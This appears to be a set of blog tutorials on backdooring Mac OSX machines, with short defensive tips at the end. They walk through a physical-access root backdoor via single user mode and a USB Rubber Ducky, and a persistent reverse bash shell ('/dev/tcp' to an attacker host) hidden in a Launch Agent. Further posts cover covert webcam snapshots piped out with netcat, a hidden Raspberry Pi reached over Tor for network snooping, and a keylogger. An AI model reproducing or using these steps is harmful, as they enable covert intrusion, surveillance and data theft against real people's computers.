Often times, physical access to a machine means game over. While people like to think that OSX is immune to most security threats, even Apple computers can be susceptible to physical attacks. Mac OSX is capable of booting into single user mode by holding a special key combination (Command-S). From this point, an attacker has root access to the entire computer. Note that this is not a security exploit, but rather an intentionally designed feature. While of course the intruder needs to be physically present, this can become a huge security problem. (There is proven method for preventing this attack that I will cover at the end of the article.)

Since physical access to the machine is required, time is precious and must be cut to a minimum. There are two methods for optimizing time, scripts and a little tool called the USB Rubber Ducky. The Rubber Ducky is small HID that looks like a flash drive and acts like a keyboard. It is designed to pound out scripts at freakish speeds, as if you were typing it yourself. Of course, a flash drive will work too.

This backdoor is almost identical to the basic backdoor described in OSX Backdoor – Persistence. Read that article if you would like to better understand the inner workings of this backdoor. Similarly, we will create a script that sends a shell back home through netcat. Finally, we will add the script as a Launch Daemons where it will be executed as root every 60 seconds.

The Rubber Ducky Method

Be sure to use duck_v2.1.hex or above. There are instructions on how to flash your ducky. At the time of writing this, I used Ducky Decoder v2.4 and duck_v2.1.hex firmware. (Special thanks to midnitesnake for patching the firmware)

2) Create the script source.txt.

Be sure to replace mysite.com with your IP address or domain name. Similarly, place your port number 1337 on the same line.

disk1s1 will change! If you’re not sure which device is your flash, take out your device, list devices, put your flash drive back in, and list devices. Your flash drive will be the device that has come and gone.

4) Catch your shell.

nc -l -p 1337

nc -l 1337

The difference between the USB Rubber Ducky method and the flash drive method is night and day. There is a little more preparation that goes into setting up the ducky, but execution time is prime. When time is of the essence, listing devices, making directories, and mounting flash drives can impede on an “operation.” Either route you choose, both methods will ensure a persistent backdoor as the root user

As for preventing this lethal attack, there are two possible defenses. Locking the EFI firmware will prevent users from accessing single user mode by locking single user mode with a password. Don’t do this. It is a complete waste of time. The password can be reset by removing physical RAM and resetting the PRAM as described here. The only sure way to prevent unwanted root access to your system is by simply enabling File Vault’s full disk encryption (not home folder encryption!). Since this encrypts the entire drive, it is will be impossible to access single user mode without the (strong) password. Problem solved.

This article was written to show the vulnerabilities of Macs without full disk encryption or locked EFI firmware. Please no one get in trouble. It is very easy to sniff the wire and find the attacker’s IP address that is causing excessive noise every 60 seconds.

I put the script and version 2.6.3 of the ducky encoder on Github for convenience. If you found this interesting, give a star. Thanks for reading.

OSX has a very unique approach to fending off malware. Rather than using built-in antivirus software to discover and remove malware off of a system, OSX attempts to solve this problem by using the opposite approach. Rather than rejecting executables that may be harmful, the system only executes code that is signed and confirmed to be safe. This is a much more sophisticated way of keeping your computer safe.

For those of you who don’t know, code signing is simply a way of identifying a piece of software as authentic. It ensures that the code has not been tampered with since it was signed. Much like an author’s signature, code signing is unique to each writer and is confirmed with Apple Developer program. Through the use of cryptography, it is virtually impossible to “fake” a signature by brute force.

Since the Mac OS takes an inclusive approach to marking safe software, most Mac users have virtually no form of virus detection. By default, GateKeeper rejects all software that isn’t signed and downloadable from the App Store. Many users turn this setting off, allowing them to execute unsigned code. Our backdoor will be exploiting the lack of virus protection on OSX. (I will show a solution to this attack at the end)

Our backdoor is going to be based off of a one-liner that creates a reverse tcp bash shell.

bash -i >& /dev/tcp/my.site.here.com/1337 0>&1

This command is creating a bash shell and forwarding it to a remote host. In our case the remote host will be our publicly accessible computer. Pick a port number such as 1337. If you do not have a domain name to use, simply put your IP address (ex. 72.182.129.154).

Note: Most ISPs issue dynamic IP addresses, meaning they can change at any time. If your IP address were to change at any time, you would no longer have access to your backdoor. To prevent this, I recommend obtaining a free subdomain name online. There are many services that will issue you a free subdomain name and some software that will keep your dynamic IP address tied to your new subdomain name.

Since our payload is making a reverse connection, it is important that your computer is accessible from the internet. To do this, connect to your LAN’s router and setup port forwarding on TCP 1337 (whichever port you used) or turn on DMZ.

Note: DMZ stands for demilitarized zone. This essentially makes your computer visible to anyone on the internet. Do not turn this on if you do not know what you are doing.

To catch our reverse connection, we will use Netcat. Here is how we catch our reverse bash. Commands vary slightly depending on your machine.

nc -l -p 1337

nc -l 1337

This command tells your machine to run Netcat and listen on port 1337. When a connection is made by the victim, a shell is created. Test out your one liner by executing it on your test “victim” computer and catching it with netcat on your “attacker” computer.

Awesome! We have successfully created a reverse shell to our victim across the net. Since the victim must connect to us before we can control it, it is important that the victim’s machine attempts to connect back on its own in intervals. The solution to this is Apple’s Launch Agents. A Launch Agent is simply a .plist that, in our case, consists of a command and an interval.

Before we get to the Launch Agents, lets create a shell script with our one-liner reverse shell. Create connect.sh. This is a shell script that calls our reverse shell and then waits for the shell to exit. (the wait command is necessary so that launchd does not kill our shell early)

#!/bin/bash
bash -i >& /dev/tcp/my.site.here.com/1337 0>&1
wait

Create a hidden directory in the victim’s home folder called .hidden. Copy connect.sh to the hidden directory. Give the shell script permission to execute.

Labels are written in com.*.* form (ex. com.my.sneakyagent). Pick something clever that won’t conflict with preexisting Launch Agents.

RunAtLoad tells the system to execute the program immediately.

StartInterval is the interval of seconds between each execution. (Ex. StartInterval of 300 will execute our reverse shell every 5 minutes)

AbandonProcessGroup is some syntactic sugar that prevents launchd from killing our process (Yes, launchd will kill processes if it isn’t behaving as it should.)

Now that we have our LaunchAgent, lets load it into our test machine. Launch Agents are located in ~/Library/LaunchAgents/

launchctl load com.my.sneakyagent.plist

Done! Listen for the reverse connection using the Netcat command from above.

Note: The maximum time that you will have to wait for an incoming connection is equal to the interval set in your Launch Agent. Larger intervals are less noisy, but smaller intervals mean less waiting. Your pick…

Now that you have learned how easy it is to setup a backdoor on just about any OSX machine, lets find a way to prevent this. Little Snitch is a tool that notifies you of all outgoing connections. Since our backdoor relies on an outgoing connection to our machine at port 1337, Little Snitch should catch this connection before the attacker is able to gain access.

Here is the complete project on Github. If you found this interesting, give a star. Thanks for reading.

Cameras come built-in on practically every Mac on the market. What’s even more interesting is that these cameras do not require special user permissions to access. This means that pictures can be taken by an attacker and viewed anywhere in the world, at any given moment. This can be a huge security and privacy exploit. Assuming that you have already configured and installed the backdoor discussed in OSX Backdoor – Persistence, lets add the ability to take pictures on a test victim’s computer.

Imagesnap is a quick and easy tool written by Robert Harder that simply takes a picture from a built-in camera. Download the repository from Github here and try running imagesnap in Terminal.

Looking good! Now lets add this to our backdoor and add permission to execute.

cp imagesnap ~/.hidden/

Note: If you are copying imagesnap to the hidden directory via the backdoor itself, imagesnap will not have permission to execute. This is a built-in safeguard that OSX implements to prevent software from executing foreign code.You must run the following line to give it proper permissions.

chmod +x ~/.hidden/imagesnap

We have successfully hidden our imagesnap executable in the test victim’s home directory. Try taking a snapshot using our backdoor shell. Now lets send the snapshot home. First initiate a listener on the “attacking” computer with Netcat on port 1337.

nc -l -p 1337 > ~/Desktop/snapshot.jpg

After you have first initiated your listener, send the file from the victim’s computer by piping the image through Netcat.

cat ~/.hidden/snapshot.jpg | nc my.site.here.com 1337

Note: If you are executing this line via your backdoor, you will have to resolve ~/.hidden/ to /Users/username/.hidden/

If all went well, you should have a copy of the snapshot on your desktop.

Here is the complete project on Github. If you found this interesting, give a star. Thanks for reading.

So I recently built a Litecoin miner. If you haven’t heard of Litecoin, it is basically a new cryptocurrency that branched off of Bitcoin. This rig is based off of the standard 4x Sapphire Radeon 7950 setup. Each card is pulling 600 khash/s, totalling about 2.4 mhash/s altogether. I’m using two PCIe x1 to PCIe x16 adapters and two powered PCI-e x16 adapters. The open air case was built from aluminum angles. The machine runs Xubuntu Linux and pulls about 1200 watts consistently.

So I recently obtained a new Raspberry Pi this week. Being as though many owners have already used the Pi as a simple web server, I found that it would be interesting to use this tiny computer for covert ‘analysis’ of remote networks. The Pi can be used to tap into networks via Ethernet or WiFi. Due to the size of this guy, it can easily be placed out of view.

Controlling the Pi over SSH will be the most difficult challenge to overcome when using this device remotely. A first option would consist of directly connecting to the Pi over the internet. It is most likely that the Pi will be behind some sort of firewall or router. This makes incoming connections unreasonably difficult. A second option would involve a repetitive reverse connection that would ‘call home’ on a given interval. This is noisy and could cause unwanted attention. The option that I would like to explore consists of using private networks to gain public exposure.

Since setting up a virtual private network can be time consuming and revealing, we will use Tor as an ‘anonymous’ and easy alternative. Before we get into that, lets download and image the Pwn Pi distribution. You can use whatever distribution that you like or make your own if you have the time. I don’t have the time.

Setting up the Pi

Double check the SHA1 hash. Unzip the image. Unmount the SD card. Copy over the image.

These settings will create a hidden ssh service on port 22 of the local loopback address. For these settings to take effect you can either restart tor or simply restart the Pi.

service tor restart
#Or
shutdown -r now

Check to make sure that tor is up and running on port 9050 by running nmap on your localhost. You should now have two important files located in the /var/lib/tor/hidden_service/ directory called hostname and private_key. Your private_key should stay private, as the name implies, and your hostname should stay as private as you need it to be. The hostname contains the address to your raspberry pi’s hidden ssh service. This will be important later on. If Tor did not generate hidden service files or Tor does not appear to start automatically at boot time, you may need to change ownership of the directory. Run the commands below and restart.

Connecting to the Pi

Now that we have our hidden ssh service up and running, let’s attempt to make a connection. Download and install Tor if you haven’t already. Download connect.c and compile it. Next, create a file named config in your ~/.ssh directory. Adding the following lines to the config will cause all *.onion domains to be passed through the connect program.

You should now be good to go. Startup tor and connect to your Pi via the hostname found at /var/lib/tor/hidden_service/hostname on the Pi.

tor &
ssh root@swzwwr7xg6z77mjn.onion

It is very likely that you will experience a lot of lag when working through Tor. This is the price you pay. Overall, I think this is a pretty cool concept. Not only can you connect to your Pi from anywhere in the world, but your Pi could be anywhere else in the world too! As long as your two devices have internet access, they will never be apart.

As described in the previous tutorial OSX Backdoor – Persistence, we learned how easy it is to implement a simple backdoor onto any OSX system. Since our backdoor is comprised of lower level Launch Agents and shell scripts, it is essentially invisible to your typical user. As more and more software is installed on a system, it often becomes difficult to become aware of this type of malware before it can do damage.

To prevent practically any form of backdoor from functioning on your system, it is vital that the reverse connection be blocked altogether. A good first defense is always checking your Launch Agents, Launch Deamons, and Startup Items.

This tool is very useful for monitoring your computer’s activities. Whether software is running in a GUI or hidden in the background, you can be sure that no unauthorized connections will be made. Many different rules can be set to allow and block different types of connections. Little Snitch can be found on the App Store for a few $$$. Congratulations, you blocked your own backdoor.

A simple key logger that is targeted for Mac OSX machines. This program records keystrokes and modifier keys. Additionally, the program in which the keys were pressed is also recorded. The log is saved to the desktop. Note: Enable access for assistive devices will need to be enable in the ‘Accessibility’ pane of System Settings for newer Macs.